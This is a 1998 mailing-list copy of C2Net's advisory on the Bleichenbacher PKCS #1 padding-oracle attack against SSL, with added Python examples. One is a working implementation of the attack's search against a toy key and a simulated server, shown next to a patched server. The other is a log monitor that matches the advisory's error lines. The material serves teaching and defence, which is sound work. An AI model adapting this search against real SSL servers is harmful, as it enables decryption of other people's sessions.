Date: Fri, 26 Jun 1998 09:48:19 -0500
From: Aleph One <[email protected]>
To: [email protected]
Subject: SSL Vulnerability

http://www.c2.net/products/stronghold/support/PKCS1.php
Background
Last week, RSA Data Security notified C2Net Software of a potential
vulnerability that affects the SSL protocol. C2Net Software has
developed a pre-emptive patch which is implemented in the latest
version of Stronghold 2.3. This document is intended to address
questions C2Net customers may have about the implications of that
discovery to their own site.
Technical information
This vulnerability involves a chosen ciphertext attack, discovered by
researcher Daniel Bleichenbacher at Bell Labs, against interactive key
establishment protocols that use PKCS #1 (v1.5, block type 2) padding,
such as SSL. The server's visibly different handling of correctly and
incorrectly padded RSA decryptions acts as an oracle: by repeatedly
sending approximately one million carefully constructed messages and
observing the server's response to each, an attacker can recover the
session key used for a particular session.
Please see our press release and advisory for additional
details. RSA Labs brought this attack to our attention and their
site contains a more technical overview. CERT will also issue a
bulletin, as will a number of other web server vendors.
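The attack sketched above, worked through as an added example (this is not C2Net's, RSA's or Bleichenbacher's code). It builds a toy 92-bit RSA key from two Mersenne primes, a server that answers only whether the decrypted block has type 02 (the simplified oracle assumed in the paper, and the condition behind the "block type is not 02" error), the adaptive chosen-ciphertext search of steps 2 to 4 of the paper (blinding is omitted because a genuine ciphertext is already conforming), and beside it the countermeasure later written into TLS, continuing with a random premaster secret on padding failure. The key, the one-byte "session key" and the claim that a patch behaves like PatchedServer are constructed assumptions; the advisory does not say what the Stronghold build does. Because the modulus is tiny the conforming fraction is about 2^-12 rather than 2^-16 and the attack finishes in thousands of queries instead of a million.

```python
import random

# Toy key, constructed for speed: two Mersenne primes give a 92-bit modulus.
P = (1 << 61) - 1
Q = (1 << 31) - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))   # modular inverse, Python 3.8+
K = (N.bit_length() + 7) // 8       # encryption block length: 12 bytes
B = 1 << (8 * (K - 2))              # the paper's B = 2^(8(k-2))
MSG_LEN = K - 11                    # fixed-length secret: 1 byte here, 48 in TLS

def pkcs1_v15_pad(msg: bytes) -> int:
    """EB = 00 || 02 || PS (>= 8 non-zero bytes) || 00 || msg, as an integer."""
    ps = bytes(random.randrange(1, 256) for _ in range(K - 3 - len(msg)))
    return int.from_bytes(b"\x00\x02" + ps + b"\x00" + msg, "big")

def rsa_encrypt(m: int) -> int:
    return pow(m, E, N)

class VulnerableServer:
    """Reveals whether the block type is 02: the oracle behind the
    'block type is not 02' / 'bad rsa decrypt' error lines."""
    def __init__(self):
        self.queries = 0

    def conforming(self, c: int) -> bool:
        self.queries += 1
        eb = pow(c, D, N).to_bytes(K, "big")
        return eb[0] == 0 and eb[1] == 2

class PatchedServer:
    """Countermeasure later specified for TLS (RFC 5246 7.4.7.1): on a bad
    block, continue with a random secret instead of reporting an error.
    Assumed here, not taken from the advisory; real code must also keep the
    timing of both paths identical."""
    def premaster(self, c: int) -> bytes:
        eb = pow(c, D, N).to_bytes(K, "big")
        sep = eb.find(b"\x00", 2)
        bad = eb[0] != 0 or eb[1] != 2 or sep < 10 or K - sep - 1 != MSG_LEN
        fallback = bytes(random.randrange(256) for _ in range(MSG_LEN))  # always drawn
        return fallback if bad else eb[sep + 1:]

def ceil_div(a: int, b: int) -> int:
    return -(-a // b)

def merge(intervals):
    """Union of closed integer intervals, sorted and with overlaps joined."""
    intervals.sort()
    out = []
    for lo, hi in intervals:
        if out and lo <= out[-1][1] + 1:
            out[-1] = (out[-1][0], max(out[-1][1], hi))
        else:
            out.append((lo, hi))
    return out

def attack(oracle, c0: int) -> int:
    """Bleichenbacher steps 2-4; step 1 (blinding) skipped, so s0 = 1."""
    def conforms(s):
        return oracle.conforming(c0 * pow(s, E, N) % N)

    def next_conforming(s):            # steps 2a/2b: search upward from s
        while not conforms(s):
            s += 1
        return s

    M = [(2 * B, 3 * B - 1)]
    s = next_conforming(ceil_div(N, 3 * B))
    while True:
        # step 3: keep the m in M with 2B <= m*s - r*N <= 3B-1 for some r
        new_M = []
        for a, b in M:
            for r in range(ceil_div(a * s - 3 * B + 1, N), (b * s - 2 * B) // N + 1):
                lo = max(a, ceil_div(2 * B + r * N, s))
                hi = min(b, (3 * B - 1 + r * N) // s)
                if lo <= hi:
                    new_M.append((lo, hi))
        M = merge(new_M)
        if len(M) == 1 and M[0][0] == M[0][1]:    # step 4: m is pinned down
            return M[0][0]
        if len(M) > 1:                             # step 2b
            s = next_conforming(s + 1)
            continue
        a, b = M[0]                                # step 2c: roughly halves [a, b]
        r = ceil_div(2 * (b * s - 2 * B), N)
        while True:
            cands = range(ceil_div(2 * B + r * N, b), (3 * B - 1 + r * N) // a + 1)
            hit = next((cand for cand in cands if conforms(cand)), None)
            if hit is not None:
                s = hit
                break
            r += 1

def demo(seed: int = 1):
    """Encrypt a one-byte 'session key' and recover it through the oracle.
    Returns (recovered == original, number of oracle queries used)."""
    random.seed(seed)
    m = pkcs1_v15_pad(b"K")
    server = VulnerableServer()
    return attack(server, rsa_encrypt(m)) == m, server.queries
```

Calling demo() recovers the padded plaintext, and with it the "session key", from the ciphertext alone using only yes/no answers from VulnerableServer; the private key D is never learned, which is why the advisory says the whole exchange must be repeated per session. PatchedServer returns a secret of the right length on every input, so the client-visible behaviour no longer depends on the padding and the search has nothing to steer by.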
What does it mean?
A sophisticated attacker who has recorded an SSL session could decrypt
that session's session key, and with it the data transmitted during
the session, if they also have a machine from which they can send
approximately one million carefully selected messages to your server
and observe which errors it reports. Note that this attack has to be
repeated, roughly a million messages each time, for each and every
session that an attacker wishes to compromise, because the server's
private key is not compromised by this attack.
How can I tell if I'm being attacked?
For each of the approximately one million messages necessary to
attack a single session, the following three lines will be logged in
your ssl/error_log file (1575 here is the ID of the server process
that handled the connection):
1575:error:0407006B:rsa routines:RSA_padding_check_PKCS1_type_2:block type is not 02:rsa_pk1.c:207
1575:error:04064072:rsa routines:RSA_EAY_PRIVATE_DECRYPT:padding check failed:rsa_eay.c:330
1575:error:1408B076:SSL routines:SSL3_GET_CLIENT_KEY_EXCHANGE:bad rsa decrypt:s3_srvr.c:1259
NOTE that this equates to about 300MB of log for an attack on a single
session. Running out of space on the partition your log files are
written to could certainly be an indication, but we suggest keeping an
eye out for any unusual growth in the size of this file well before
that point.
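A small monitor for those entries, as an added example and not a C2Net tool. It counts the "bad rsa decrypt" line (one is written per attack message) per server process, turns the count into a rate over the polling interval because the entries carry no timestamp, and reads the log incrementally so it survives rotation. The three sample entries are the advisory's; the two neighbouring noise lines, the default threshold and the default path are constructed assumptions to be tuned for your server.

```python
import os
import re
from collections import Counter

# SSLeay ERR_print_errors format: pid:error:code:library:function:reason:file:line
ENTRY = re.compile(
    r"^(?P<pid>\d+):error:(?P<code>[0-9A-Fa-f]{8}):(?P<lib>[^:]*):"
    r"(?P<func>[^:]*):(?P<reason>[^:]*):(?P<file>[^:]*):(?P<line>\d+)$")

# Exactly one 'bad rsa decrypt' entry (the third of the advisory's three lines)
# is written per attack message, so that is the one counted.
BAD_RSA_DECRYPT = "1408B076"
QUERIES_PER_SESSION = 1_000_000      # the advisory's figure for one session

# Constructed sample: the advisory's three lines repeated by one child process,
# then a plain Apache error and a single failure from another process.
SAMPLE_LOG = [
    "1575:error:0407006B:rsa routines:RSA_padding_check_PKCS1_type_2:block type is not 02:rsa_pk1.c:207",
    "1575:error:04064072:rsa routines:RSA_EAY_PRIVATE_DECRYPT:padding check failed:rsa_eay.c:330",
    "1575:error:1408B076:SSL routines:SSL3_GET_CLIENT_KEY_EXCHANGE:bad rsa decrypt:s3_srvr.c:1259",
] * 4 + [
    "[Fri Jun 26 09:48:19 1998] [error] File does not exist: /home/httpsd/htdocs/favicon.ico",
    "1580:error:1408B076:SSL routines:SSL3_GET_CLIENT_KEY_EXCHANGE:bad rsa decrypt:s3_srvr.c:1259",
]

def parse_entry(line: str):
    """Fields of one SSLeay error entry, or None for any other line."""
    m = ENTRY.match(line.rstrip("\r\n"))
    return m.groupdict() if m else None

def count_bad_decrypts(lines) -> Counter:
    """Number of 'bad rsa decrypt' errors per server process."""
    per_pid = Counter()
    for line in lines:
        e = parse_entry(line)
        if e and e["code"].upper() == BAD_RSA_DECRYPT:
            per_pid[e["pid"]] += 1
    return per_pid

def assess(lines, interval_s: float, max_per_minute: float = 60.0) -> dict:
    """Rate of padding failures over the polling interval against a threshold.

    max_per_minute is an assumed default: a healthy server sees these errors
    only from broken clients, while an attack needs about a million per session."""
    per_pid = count_bad_decrypts(lines)
    total = sum(per_pid.values())
    per_minute = total * 60.0 / interval_s
    return {
        "total": total,
        "per_minute": per_minute,
        "busiest_pid": per_pid.most_common(1)[0][0] if per_pid else None,
        "session_fraction": total / QUERIES_PER_SESSION,  # progress toward one session
        "alert": per_minute >= max_per_minute,
    }

def read_new_lines(path: str, offset: int):
    """Lines appended since offset, and the new offset; restarts after rotation."""
    if os.path.getsize(path) < offset:
        offset = 0
    with open(path, "r", errors="replace") as f:
        f.seek(offset)
        lines = f.readlines()
        return lines, f.tell()

if __name__ == "__main__":
    import sys, time
    path = sys.argv[1] if len(sys.argv) > 1 else "ssl/error_log"   # assumed location
    interval = 60.0
    offset = os.path.getsize(path) if os.path.exists(path) else 0   # skip history
    while True:
        time.sleep(interval)
        lines, offset = read_new_lines(path, offset)
        report = assess(lines, interval)
        if report["alert"]:
            print("possible PKCS#1 oracle attack:", report)
```

On the sample, process 1575 accounts for four failures and 1580 for one; at a one-second poll that is 300 per minute and trips the default threshold, at a ten-minute poll it does not. Because one session costs the attacker around a million queries, session_fraction tells you how far along a sustained burst has got, and the busiest pid identifies the child whose connection to trace back in the access log.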
What can I do to protect myself?
This vulnerability has only been reported in a research environment
and there have not been reports of sites experiencing this attack
outside of that. However, the publication of this type of
vulnerability may enable sophisticated users to implement it.
Customers are urged to upgrade as a precaution to the latest
version of Stronghold 2.3, which supports this fix as of build
2010 for customers in the US/Canada, build 2051 for customers
elsewhere. You can determine which version you are running from the
output of httpsd -v.
What other vendors/products are affected?
All major vendors have announced that they are working on patched
versions of their web servers products to combat this potential
vulnerability. This vulnerability is not limited to web servers.
Products using SSL to do secure tunneling, for example, may also be
affected.
Sites with other information:
http://www.rsa.com/rsalabs/
http://www.ssleay.org/announce/pkcs1.html
http://www.microsoft.com/security/bulletins/ms98-002.htm
http://www.openmarket.com/security/
http://help.netscape.com/products/server/ssldiscovery/
http://www.consensus.com/ssl-rsa.html
ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/README.PKCS1